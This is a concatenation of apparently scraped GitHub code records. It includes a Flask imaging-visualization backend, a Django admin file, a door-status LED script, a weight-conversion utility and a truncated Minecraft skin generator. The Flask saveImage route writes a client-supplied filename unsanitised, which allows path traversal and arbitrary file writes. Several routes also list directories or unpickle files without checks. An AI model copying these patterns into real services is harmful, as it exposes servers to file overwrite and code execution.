axis=1).astype(int)\n\n _json = {\n 'planes': list(range(int(seq.shape[1]+1))),\n 'height': int(seq.shape[2]),\n 'width': int(seq.shape[3]),\n 'length': length\n }\n for channel in range(seq.shape[4]):\n _json['channel_%s' % str(channel)] = \\\n list(norming_vals[channel].astype(float))\n\n return jsonify(**_json)\n\n\n@app.route('/getChannels', methods=['GET', 'POST'])\ndef getChannels():\n ds_path = request.args.get('directory')\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n ds = ImagingDataset.load(ds_path)\n except IOError:\n return ''\n channels = ds.channel_names\n else:\n try:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n except IOError:\n return ''\n channels = ['channel_' + str(idx) for idx in range(seq.shape[4])]\n\n if (len(channels) > 1):\n channels += ['overlay']\n return render_template('select_list.html', options=channels)\n\n\n@app.route('/getCycles', methods=['GET', 'POST'])\ndef getCycles():\n ds_path = request.args.get('directory')\n\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n ds = ImagingDataset.load(ds_path)\n except IOError:\n return ''\n return render_template(\n 'select_list.html', options=range(ds.num_sequences))\n\n return ''\n\n\n@app.route('/getLabels', methods=['GET', 'POST'])\ndef getLabels():\n ds_path = request.form.get('path')\n try:\n dataset = ImagingDataset.load(ds_path)\n except:\n return jsonify({ 'labels': [] })\n\n try:\n with open(os.path.join(dataset.savedir, 'rois.pkl'), 'rb') as f:\n labels = pickle.load(f).keys()\n except:\n return jsonify({ 'labels': [] })\n\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'opca*.npz'))))\n\n labels = filter(lambda x: len(x) > 0, labels)\n #return render_template('select_list.html',options=['']+labels)\n return jsonify({ 'labels': labels })\n\n\n@app.route('/getRoiList', methods=['GET','POST'])\ndef getRoiList():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n\n return render_template('select_list.html', options=['']+labels)\n\n\n@app.route('/getComponenets', methods=['GET', 'POST'])\ndef getComponents():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n quality = 100\n\n if re.match('^ica',label) is not None:\n components = np.load(os.path.join(ds_path,label))['st_components']\n else:\n components = np.load(os.path.join(ds_path, label))['oPCs']\n\n projectedRois = {}\n for i in range(components.shape[3]):\n vol = components[:, :, :, i]\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.nanmean(vol, axis=2).T\n\n label = 'component_' + str(i)\n\n projectedRois[label] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(**projectedRois)\n\n\n@app.route('/getRoiMasks', methods=['GET', 'POST'])\ndef getRoiMasks():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n index = request.form.get('index', type=int)\n overlay = True\n quality = 100\n\n dataset = ImagingDataset.load(ds_path)\n rois = dataset.ROIs[label]\n num_rois = len(rois)\n if index is not None:\n indicies = [index]\n else:\n indicies = range(num_rois)\n projectedRois = {}\n\n if overlay is True:\n vol = np.zeros(list(dataset.frame_shape[:3])+[3])\n cmap = matplotlib.cm.jet\n norm = matplotlib.colors.Normalize(vmin=0, vmax=num_rois)\n m = matplotlib.cm.ScalarMappable(norm=norm, cmap=cmap)\n\n for index in indicies:\n color = np.array(m.to_rgba(index))[:-1]\n color /= np.sum(color)\n roiVol = np.array(\n [plane.todense().astype(float) for plane in rois[index].mask])\n mask2 = ma.masked_where(\n np.logical_and(\n np.sum(vol, axis=-1) > 0, roiVol > 0), roiVol).mask\n mask1 = ma.masked_where(\n np.logical_and(np.logical_not(mask2), roiVol > 0), roiVol).mask\n\n if np.any(mask1):\n vol[mask1] = color\n\n if np.any(mask2):\n vol[mask2] = vol[mask2]/2+color/2\n\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.swapaxes(np.nanmean(vol, axis=2), 0, 1)\n\n projectedRois['rois'] = {\n 'z': convertToColorB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToColorB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToColorB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n return jsonify(num_rois=num_rois,**projectedRois)\n\n for i,roi in enumerate(rois):\n mask = roi.mask\n vol = np.array([plane.todense().astype(float) for plane in mask])\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.nanmean(vol, axis=2).T\n\n if roi.label is None:\n roi.label = 'roi_' + str(i)\n\n projectedRois[roi.label] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(**projectedRois)\n\n\n@app.route('/getRois', methods=['GET', 'POST'])\ndef getRois():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n\n dataset = ImagingDataset.load(ds_path)\n convertedRois = {}\n try:\n rois = ROIList.load(os.path.join(dataset.savedir,'rois.pkl'),label=label)\n except:\n return jsonify({})\n\n for i, roi in enumerate(rois):\n if roi.id is None:\n roi.id = i\n\n roi_points = []\n try:\n for i in range(dataset.frame_shape[0]):\n roi_points.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:, :, 2])):\n roi_points.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n if np.all(coords[-1] == coords[0]):\n coords = coords[:-1]\n plane = int(coords[0,-1])\n coords = coords[:,:2].astype(int).tolist()\n roi_points[plane].append(coords)\n\n convertedRois[roi.id] = {\n 'label': roi.label,\n 'points': roi_points\n }\n\n return jsonify(**convertedRois)\n\n\n@app.route('/getRoi', methods=['GET','POST'])\ndef getRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n roi_id = request.form.get('id')\n\n dataset = ImagingDataset.load(ds_path)\n convertedRois = {}\n try:\n rois = ROIList.load(os.path.join(dataset.savedir,'rois.pkl'),label=label)\n except:\n return jsonify({})\n\n for i,roi in enumerate(rois):\n if roi.id == roi_id:\n break\n\n roi_points = []\n try:\n for i in range(roi.im_shape[0]):\n roi_points.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:,:,2])):\n roi_points.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n if np.all(coords[-1] == coords[0]):\n coords = coords[:-1]\n plane = int(coords[0,-1])\n coords = coords[:,:2].astype(int).tolist()\n roi_points[plane].append(coords)\n\n return jsonify({\n roi.id : {\n 'label': roi.label,\n 'points': roi_points\n }\n })\n\n\n@app.route('/getFrames', methods=['GET','POST'])\ndef getFrames():\n ds_path = request.form.get('path')\n request_frames = request.form.getlist('frames[]', type=int)\n normingVal = json.loads(request.form.get('normingVal'))\n sequenceId = request.form.get('sequenceId')\n channel = request.form.get('channel')\n planes = request.form.getlist('planes[]', type=int)\n cycle = request.form.get('cycle', type=int)\n\n if planes is None:\n planes = [0]\n\n quality = 40\n if channel == 'overlay':\n channel = None\n\n ds = None\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n ds = ImagingDataset.load(ds_path)\n seq = ds.sequences[cycle]\n channel = ds._resolve_channel(channel)\n else:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n if channel:\n channel = int(channel.split('_')[-1])\n\n if channel is not None:\n if len(planes) > 1:\n load_frames = frame_loader.load_frames_multiplane\n else:\n load_frames = frame_loader.load_frames\n planes = planes[0]\n\n else:\n if len(planes) > 1:\n load_frames = frame_loader.load_frames_multiplane_2chan\n else:\n load_frames = frame_loader.load_frames_2chan\n planes = planes[0]\n\n end = False\n frames = {}\n lut_cutoffs = np.array(normingVal[:])[channel].astype(float)\n frames = {'frame_%s' % idx: {} for idx in request_frames}\n if -1 in request_frames and ds is not None:\n request_frames.remove(-1)\n try:\n with open(os.path.join(ds.savedir, 'time_averages.pkl')) as f:\n time_averages = pickle.load(f)\n if not isinstance(time_averages, np.ndarray):\n raise Exception('no time average')\n except:\n time_averages = seq._get_frame(0)\n ta_luts = lut_cutoffs\n else:\n ta_luts = np.vstack((\n [np.nanpercentile(f, 2) for f in\n np.rollaxis(ds.time_averages, -1, 0)],\n [np.nanpercentile(f, 99) for f in\n np.rollaxis(ds.time_averages, -1, 0)])).T\n ta_luts = ta_luts[channel]\n\n load_frames(np.expand_dims(time_averages, 0), [-1], ta_luts,\n planes, channel, quality, frames)\n\n request_frames = list(filter(lambda i: 0 <= i <= seq.shape[0], request_frames))\n if not len(request_frames):\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n seq = sima_sequences._SplicedSequence(seq, request_frames)\n\n load_frames(seq, request_frames, lut_cutoffs, planes, channel, quality,\n frames)\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n\ndef deleteme():\n for frame_number in request_frames:\n if frame_number > len(seq)-1 or frame_number < -1:\n end = True\n continue\n\n elif frame_number == -1 and ds is not None:\n try:\n time_averages = pickle.load(\n open(os.path.join(ds.savedir, 'time_averages.pkl')))\n if not isinstance(time_averages, np.ndarray):\n raise Exception('no time average')\n except:\n vol = seq._get_frame(0)\n else:\n vol = ds.time_averages\n norming_val = np.vstack((\n [np.nanpercentile(f, 2) for f in\n np.rollaxis(ds.time_averages, -1, 0)],\n [np.nanpercentile(f, 99) for f in\n np.rollaxis(ds.time_averages, -1, 0)])).T\n else:\n vol = seq._get_frame(frame_number)\n\n if channel is not None:\n norming_val = norming_val[channel]\n vol = vol[:, :, :, channel]-norming_val[0]\n vol = vol/((norming_val[1]-norming_val[0])/255.0)\n vol = np.clip(vol, 0, 255)\n else:\n vol = np.hstack(((vol[:,:,:,0]-norming_val[0][0])/(norming_val[0][1]-norming_val[0][0]),\n (vol[:,:,:,1]-norming_val[1][0])/(norming_val[1][1]-norming_val[1][0])))\n vol*=255\n frames['frame_'+str(frame_number)] = {};\n\n for plane in planes:\n if plane == 0:\n zsurf = np.nanmean(vol, axis=0)\n else:\n zsurf = vol[plane-1, :, :]\n\n if plane == 0:\n ysurf = np.nanmean(vol, axis=1)\n else:\n ysurf = np.zeros((vol.shape[0], vol.shape[2]))\n ysurf[plane-1, :] = np.nanmean(zsurf, axis=0)\n\n if plane == 0:\n xsurf = np.nanmean(vol, axis=2).T\n else:\n xsurf = np.zeros((vol.shape[1],vol.shape[0]))\n xsurf[:,plane-1]=np.nanmean(zsurf,axis=1).T\n\n frames['frame_'+str(frame_number)][plane] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n\n@app.route('/setRoiLabel', methods=['GET', 'POST'])\ndef setRoiLabel():\n ds_path = request.form.get('path')\n #old_label = request.form.get('oldLabel')\n old_label = ''\n new_label = request.form.get('newLabel')\n\n if new_label == '' or len(new_label) == 0:\n new_label = 'rois'\n\n dataset = ImagingDataset.load(ds_path)\n if (old_label != ''):\n rois = dataset.ROIs[old_label]\n else:\n rois = ROIList([])\n dataset.add_ROIs(rois, label=new_label)\n\n labels = dataset.ROIs.keys()\n\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'ica*.npz'))))\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'opca*.npz'))))\n\n labels = filter(lambda x: len(x) > 0, labels)\n\n return jsonify({ 'labels': labels })\n\n\n@app.route('/deleteRoiSet', methods=['GET', 'POST'])\ndef deleteRoiSet():\n ds_path = request.form.get('path')\n dataset = ImagingDataset.load(ds_path)\n label = request.form.get('label')\n\n dataset = ImagingDataset.load(ds_path)\n dataset.delete_ROIs(label)\n\n return jsonify(result='success')\n\n\n@app.route('/selectRoi', methods=['GET', 'POST'])\ndef selectRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n plane = float(request.form.get('z'))\n\n point = Point(float(request.form.get('x')), float(request.form.get('y')))\n\n dataset = ImagingDataset.load(ds_path)\n rois = ROIList.load(os.path.join(dataset.savedir, 'rois.pkl'), label=label)\n\n for roi in rois:\n for poly in roi.polygons:\n z_coord = np.array(poly.exterior.coords)[0, 2]\n if z_coord == plane or plane == -1:\n if poly.contains(point):\n return jsonify(label=roi.label, id=roi.id)\n\n return jsonify({'error': 'roi not found'})\n\n\n@app.route('/updateRoi', methods=['GET', 'POST'])\ndef updateRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n points = json.loads(request.form.get('points'))\n roi_label = request.form.get('roiLabel')\n roi_id = request.form.get('roiId')\n\n if label == '' or len(label) == 0:\n raise Exception('ROIList not found')\n\n dataset = ImagingDataset.load(ds_path)\n roi_data = []\n for i, plane in enumerate(points):\n if plane is None or not len(plane):\n continue\n array_dat = np.array(plane)\n z_dims = i*np.ones((array_dat.shape[:2]+(1,)))\n plane_data = np.concatenate((array_dat, z_dims), axis=2)\n roi_data.extend(list(plane_data))\n\n if len(roi_data) == 0:\n return jsonify(result=\"no polygons to save\")\n\n for poly in roi_data:\n if poly.shape[0] < 3:\n raise Exception(\"unable to store polygon with less then 3 points\")\n roi = ROI(polygons=roi_data,im_shape=dataset.frame_shape[:3])\n\n roi.label = roi_label\n roi.id = roi_id\n try:\n rois = dataset.ROIs[label]\n except KeyError:\n rois = []\n\n rois = filter(lambda r: r.id != roi_id, rois)\n rois.append(roi)\n dataset.add_ROIs(ROIList(rois), label=label)\n\n return jsonify(result='success')\n\n\n@app.route('/deleteRoi', methods=['GET', 'POST'])\ndef deleteRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n roi_id = request.form.get('roiId')\n\n dataset = ImagingDataset.load(ds_path)\n try:\n rois = dataset.ROIs[label]\n except KeyError:\n return jsonify(result='failed to located ROI List')\n\n rois = filter(lambda r: r.id != roi_id, rois)\n dataset.add_ROIs(ROIList(rois), label=label)\n\n return jsonify(result='success')\n\n\n@app.route('/simplifyRoi', methods=['GET', 'POST'])\ndef simplifyRoi():\n roi_id = request.form.get('roiId')\n frame_shape = json.loads(request.form.get('frame_shape'))\n points = json.loads(request.form.get('points'))\n\n roi_data = []\n for i, plane in enumerate(points):\n if plane is None or not len(plane):\n continue\n array_dat = np.array(plane)\n z_dims = i*np.ones((array_dat.shape[:2]+(1,)))\n plane_data = np.concatenate((array_dat, z_dims), axis=2)\n roi_data.extend(list(plane_data))\n try:\n roi = ROI(polygons=roi_data, im_shape=frame_shape[:3])\n except:\n return jsonify(result='failed to create ROI')\n\n smoother = SmoothROIBoundaries()\n roi = smoother.apply([roi])[0]\n\n convertedRoi = []\n try:\n for i in range(roi.im_shape[0]):\n convertedRoi.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:, :, 2])):\n convertedRoi.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n plane = int(coords[0, -1])\n coords = coords[:, :2].astype(int).tolist()\n convertedRoi[plane].append(coords)\n\n return jsonify({roi_id: {'points': convertedRoi}})\n\n\n@app.route('/getFolders')\ndef getFolders():\n directory = request.args.get('directory')\n subfolders = [\n os.path.basename(fname) for fname in glob.glob(\n os.path.join(directory, '*')) if os.path.isdir(fname) or\n os.path.splitext(fname)[-1] == '.h5']\n subfolders = ['']+sorted(subfolders)\n return render_template('select_list.html', options=subfolders)\n\n\n@app.route('/saveImage', methods=['GET', 'POST'])\ndef saveImage():\n image = request.form.get('image')\n filename = request.form.get('filename')\n fh = open(\"/home/jack/gt2497_5/\"+filename, \"wb\")\n fh.write(image.decode('base64'))\n fh.close()\n return jsonify(status='complete')\n","repo_name":"jbowler06/sima_visualization","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"12373680525","text":"from django.contrib import admin\nfrom .models import *\n\nfrom django.conf.locale.pt_BR import formats as pt_BR_formats\n\npt_BR_formats.DATETIME_FORMAT = \"d M Y H:i\"\npt_BR_formats.DATE_FORMAT = \"d M Y\"\n\n\nclass ItemAgendaAdmin(admin.ModelAdmin):\n list_display = ('data', 'hora', 'titulo', 'criado_em')\n date_hierarchy = ('data')\n search_fieldes = ('titulo',)\n filter_horizontal = ('participantes',)\n\n \n\nclass AuthorAdmin(admin.ModelAdmin):\n fields = ('name', 'title')\n \nclass AuthorAdmin(admin.ModelAdmin):\n exclude = ('birth_date')\n\n\nadmin.site.register(LocalEvento)\nadmin.site.register(ItemAgenda, ItemAgendaAdmin)\n \n# Register your models here.\n","repo_name":"Israelllira/mysite_teste","sub_path":"agenda/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70651072719","text":"\n#!/usr/bin/env -S python3 -u\n\nimport requests\nimport os\nimport time\n\ndoorIsOpen = False\n\ndef checkDoor():\n try:\n r = requests.get(\"http://fius.informatik.uni-stuttgart.de/isOpen.php\")\n if \"open\" in r.text:\n setDoorOpen(True)\n else:\n setDoorOpen(False)\n except Exception as e:\n print(\"Error in checkDoor: \", e)\n\ndef setDoorOpen(state):\n global doorIsOpen\n\n if not(state == doorIsOpen):\n doorIsOpen = state\n ceilingIP = os.environ['LED_CEILING']\n dishwasherIP = os.environ['LED_DISHWASHER']\n if doorIsOpen:\n print(\"Door was opened\")\n doCheckedPostRequestWithBody(\"http://\"+ceilingIP+\"/animationType\",1)\n doCheckedPostRequest(\"http://\"+dishwasherIP+\"?doorOpen\")\n else:\n print(\"Door was closed\")\n doCheckedPostRequestWithBody(\"http://\"+ceilingIP+\"/animationType\",0)\n doCheckedPostRequest(\"http://\"+dishwasherIP+\"/?doorClosed\")\n\ndef doCheckedPostRequest(url):\n try:\n requests.post(url)\n except Exception as e:\n print(\"Error in post: \", e)\n\ndef doCheckedPostRequestWithBody(url,state):\n try:\n requests.post(url, json={\"type\": state})\n except Exception as e:\n print(\"Error in post: \", e)\n \nwhile True:\n checkDoor()\n time.sleep(5)\n","repo_name":"FIUS/led-door-control","sub_path":"doorControll.py","file_name":"doorControll.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28402666838","text":"from factory import fuzzy\nfrom datetime import datetime, timedelta\n\n\ndef get_fuzzy_date(start_days_ago, end_days_ago):\n date = fuzzy.FuzzyDate(\n start_date=(datetime.now() - timedelta(days=start_days_ago)).date(),\n end_date=(datetime.now() - timedelta(days=end_days_ago)).date(),\n ).fuzz()\n return datetime(date.year, date.month, date.day)\n","repo_name":"fazalIqubal/track","sub_path":"api/project/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32253762375","text":"\"\"\"\nHelper functions to assist in conversion of TensorBreeze models into pytorch\nmodels\n\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom collections import OrderedDict\nimport torch\nfrom .weights_io import load_state_dict_from_file\n\nTORCH_DELIMITER = '.'\nTF_DELIMITER = '/'\nTF_POSTFIX_SEP = ':'\n\next_map = {\n 'kernel': 'weight',\n 'bias': 'bias'\n}\n\nbn_ext_map = {\n 'gamma': 'weight',\n 'beta': 'bias',\n 'moving_mean': 'running_mean',\n 'moving_variance': 'running_var',\n 'num_batches_tracked': 'num_batches_tracked'\n}\n\n\ndef split_base_ext(name, delim=TF_DELIMITER):\n \"\"\"\n Splits a name by a delimitter then splits the returning list into\n basename (as list) and ext\n \"\"\"\n name = name.split(TF_POSTFIX_SEP)[0]\n name_split = name.split(delim)\n return name_split[:-1], name_split[-1]\n\n\ndef reorder_kernel_weight(tf_weight):\n \"\"\" Reorder a tf kernel weight into a torch format \"\"\"\n len_shape = len(tf_weight.shape)\n transpose_target = list(range(len_shape))\n transpose_target = transpose_target[2:][::-1] + transpose_target[:2]\n return tf_weight.permute(transpose_target)\n\n\ndef check_if_bn(tf_name):\n \"\"\" Determine if weight is part of a batch norm layer \"\"\"\n basename, ext = split_base_ext(tf_name, TF_DELIMITER)\n return ext in bn_ext_map\n\n\ndef check_if_kernel(tf_name):\n \"\"\" Determine if weight is a FC or conv kernel \"\"\"\n basename, ext = split_base_ext(tf_name, TF_DELIMITER)\n return ext == 'kernel'\n\n\ndef convert_name(tf_name, is_bn=False):\n \"\"\"\n Converts a TensorBreeze variable name into a pytorch name\n\n Args:\n is_bn: Perform variable name conversion of BN weight\n \"\"\"\n basename, tf_ext = split_base_ext(tf_name, TF_DELIMITER)\n\n if is_bn:\n torch_ext = bn_ext_map[tf_ext]\n else:\n if tf_ext in ext_map:\n torch_ext = ext_map[tf_ext]\n else:\n torch_ext = tf_ext\n\n torch_name = TORCH_DELIMITER.join(basename + [torch_ext])\n return torch_name\n\n\ndef convert_state_dict(tf_state_dict):\n \"\"\"\n Converts a TensorBreeze `state dict` into a torch state dict\n \"\"\"\n torch_state_dict = OrderedDict()\n\n for tf_name, tf_value in tf_state_dict.items():\n is_bn = check_if_bn(tf_name)\n is_kernel = check_if_kernel(tf_name)\n\n torch_name = convert_name(tf_name, is_bn=is_bn)\n torch_value = torch.Tensor(tf_value)\n\n if is_kernel:\n torch_value = reorder_kernel_weight(torch_value)\n\n torch_state_dict[torch_name] = torch_value\n\n return torch_state_dict\n\n\ndef convert_state_dict_file(tf_file, save_file):\n \"\"\"\n Reads a tf `state dict` from file and savs it as a TensorBreeze\n state dict\n \"\"\"\n tf_state_dict = load_state_dict_from_file(tf_file)\n torch_state_dict = convert_state_dict(tf_state_dict)\n torch.save(torch_state_dict, save_file)\n","repo_name":"mingruimingrui/TensorBreeze","sub_path":"tensorbreeze/utils/tf_to_torch.py","file_name":"tf_to_torch.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26553477454","text":"import os\nimport onnxruntime as ort\nfrom PIL import Image\nimport random\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nimport numpy as np\nimport sys\nimport pygame\nfrom scipy.signal import convolve2d\n\n\ndef get_file_path(file_name):\n if hasattr(sys, '_MEIPASS'):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.dirname(os.path.abspath(__file__))\n\n file_path = os.path.join(base_path, file_name)\n return file_path\n\ndef point_vs_rect(px,py,rx,ry,rw,rh):\n return px > rx and px <= rx+rw and py > ry and py < ry+rh\n\nclass App:\n\n def __init__(self):\n\n pygame.init()\n\n self.width = 900\n self.height = 600\n self.background_color = [18,18,20]\n self.running = True\n self.window = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(\"Minecraft Skin Generator\")\n pygame.display.set_icon(pygame.image.load(get_file_path(\"icon.png\")))\n self.clock = pygame.time.Clock()\n self.keys_pressed = None\n\n self.font = pygame.font.SysFont(\"Arial\", 18)\n self.font_small = pygame.font.SysFont(\"Arial\", 10)\n\n self.session_options = ort.SessionOptions()\n self.session_options.intra_op_num_threads = 2\n self.session_options.inter_op_num_threads = 2\n\n self.model_decode = ort.InferenceSession(get_file_path(\"model_decode.onnx\"), self.session_options)\n self.model_encode = ort.InferenceSession(get_file_path(\"model_encode.onnx\"), self.session_options)\n\n self.pca_components = np.load(get_file_path(\"pca_256_components.npy\"))\n self.pca_mean = np.load(get_file_path(\"pca_256_mean.npy\"))\n self.pca_std = np.load(get_file_path(\"pca_256_latentspace_std.npy\"))\n self.pca_eigenvalues = np.load(get_file_path(\"pca_256_explained_variance.npy\"))\n\n self.skin_layout = np.zeros((64, 64))\n self.skin_layout[:8,8:24] = 1\n self.skin_layout[8:16,:32] = 1\n self.skin_layout[20:32,:56] = 1\n self.skin_layout[16:20,4:12] = 1\n self.skin_layout[16:20,20:36] = 1\n self.skin_layout[16:20,44:52] = 1\n self.skin_layout[52:,16:48] = 1\n self.skin_layout[48:,20:28] = 1\n self.skin_layout[48:,36:44] = 1\n\n self.skin_front_layout = np.load(get_file_path(\"skin_front_layout.npy\"))\n self.skin_front_overlay_layout = np.load(get_file_path(\"skin_front_overlay_layout.npy\"))\n self.skin_back_layout = np.load(get_file_path(\"skin_back_layout.npy\"))\n self.skin_back_overlay_layout = np.load(get_file_path(\"skin_back_overlay_layout.npy\"))\n with open(get_file_path(\"pca_descriptions.txt\"), \"r\") as file:\n self.slider_descriptions = file.read().splitlines()\n\n self.move_sliders = False\n self.update_sliders = False\n self.slider_move_frames = 10\n self.slider_move_target = np.clip((np.random.normal(0, 1, (256))/6) + 0.5, 0, 1)\n self.slider_move_speed = (self.slider_move_target) / self.slider_move_frames\n\n self.input_values = np.zeros((1,512), dtype=np.float32)\n self.slider_values = np.full((256), 0.5, dtype=np.float32)\n self.slider_offset = 0\n self.number_of_sliders = 256\n self.slider_spacing = 5\n self.slider_x = 10\n self.slider_y = 390\n self.slider_width = 16\n self.slider_height = 180\n self.slider_knob_height = 8\n self.number_of_sliders_shown = 42\n self.slider_colors = [(random.randint(100,255), random.randint(100,255), random.randint(100,255)) for i in range(self.number_of_sliders)]\n self.mouse_over_slider_i = None\n self.mouse_pressed_slider_i = None\n self.slider_scroll_speed = 3\n self.slider_numbers = [self.font_small.render(str(i+1), True, (255,255,255)) for i in range(256)]\n\n self.skin_surface = None\n self.skin_array = np.zeros((64, 64, 4), dtype=np.uint8)\n self.skin_render_front_surface = None\n self.skin_render_back_surface = None\n\n self.overlay = True\n\n self.sharpen_skin = False\n self.mouse_pressed_sharpen_slider = False\n self.sharpen_slider_x = self.width-200\n self.sharpen_slider_y = 193\n self.sharpen_slider_width = 170\n self.sharpen_slider_height = 18\n self.sharpen_slider_knob_width = 8\n self.sharpen_max = 25\n self.sharpen_min = 4.0001\n self.sharpen_value_default = 12\n self.sharpen_value = self.sharpen_value_default\n\n self.reduce_colors = False\n self.mouse_pressed_colors_slider = False\n self.number_colors_slider_x = self.width-200\n self.number_colors_slider_y = 264\n self.number_colors_slider_width = 170\n self.number_colors_slider_height = 18\n self.number_colors_slider_knob_width = 8\n self.number_colors_max = 64\n self.number_colors_min = 1\n self.number_of_colors_default = 16\n self.number_of_colors = self.number_of_colors_default\n\n self.mouse_pressed_range_slider = False\n self.slider_range_x = self.width-200\n self.slider_range_y = 340\n self.slider_range_width = 170\n self.slider_range_height = 18\n self.slider_range_knob_width = 8\n self.slider_range_max = 6\n self.slider_range_min = 0.1\n self.slider_range_default = 3\n self.slider_range_factor = self.slider_range_default\n\n\n self.text_randomize_slider = self.font.render(\"R - Randomize sliders\", True, (255,255,255))\n self.text_reset_slider = self.font.render(\"0 - Reset sliders\", True, (255,255,255))\n self.text_save_skin = self.font.render(\"S - Save skin\", True, (255,255,255))\n self.text_load_skin = self.font.render(\"L - Load skin\", True, (255,255,255))\n self.text_converge = self.font.render(\"H - Converge\", True, (255,255,255))\n self.text_move_sliders = self.font.render(\"M - Move sliders\", True, (255,255,255) if self.move_sliders else (100,100,100))\n self.text_toggle_overlay = self.font.render(\"O - Toggle overlay\", True, (255,255,255) if self.overlay else (100,100,100))\n self.text_sharpen = self.font.render(\"X - Sharpen\", True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(self.sharpen_value), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.text_reduce_colors = self.font.render(\"C - Reduce colors\", True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_slider_range = self.font.render(\"Slider range: \" + str(self.slider_range_factor), True, (255,255,255))\n self.text_slider_description = self.font.render(\"\", True, (255,255,255))\n\n self.update_inputs_from_sliders()\n self.run_model()\n\n\n def reduce_color_palette(self, image, num_colors):\n image = Image.fromarray(np.uint8(image))\n quantized_image = image.quantize(colors=num_colors, method=Image.Quantize.MEDIANCUT, kmeans=0, palette=None, dither=Image.FLOYDSTEINBERG)\n quantized_image = quantized_image.convert('RGB')\n return np.array(quantized_image)\n\n def apply_sharpening_filter(self, image, strength=10, sharpen_alpha=False):\n kernel = np.array([\n [0, -1, 0],\n [-1, strength, -1],\n [0, -1, 0]\n ], dtype=np.float32)\n kernel = kernel / np.sum(kernel)\n\n sharpened_image = image.copy()\n\n for i in range(4 if sharpen_alpha else 3): # Loop through color channels\n sharpened_image[:, :, i] = convolve2d(image[:, :, i], kernel, mode='same')\n\n return np.clip(sharpened_image, 0, 1)\n\n def run_model(self):\n model_output = self.model_decode.run(None, {\"input\": self.input_values})[0][0]\n model_output = model_output.transpose(1, 2, 0)\n\n # remove overlay\n if not self.overlay:\n model_output[:,:,3] = self.skin_layout\n\n alpha_mask = model_output[:,:,3:]\n\n # sharpen skin\n if self.sharpen_skin:\n model_output = 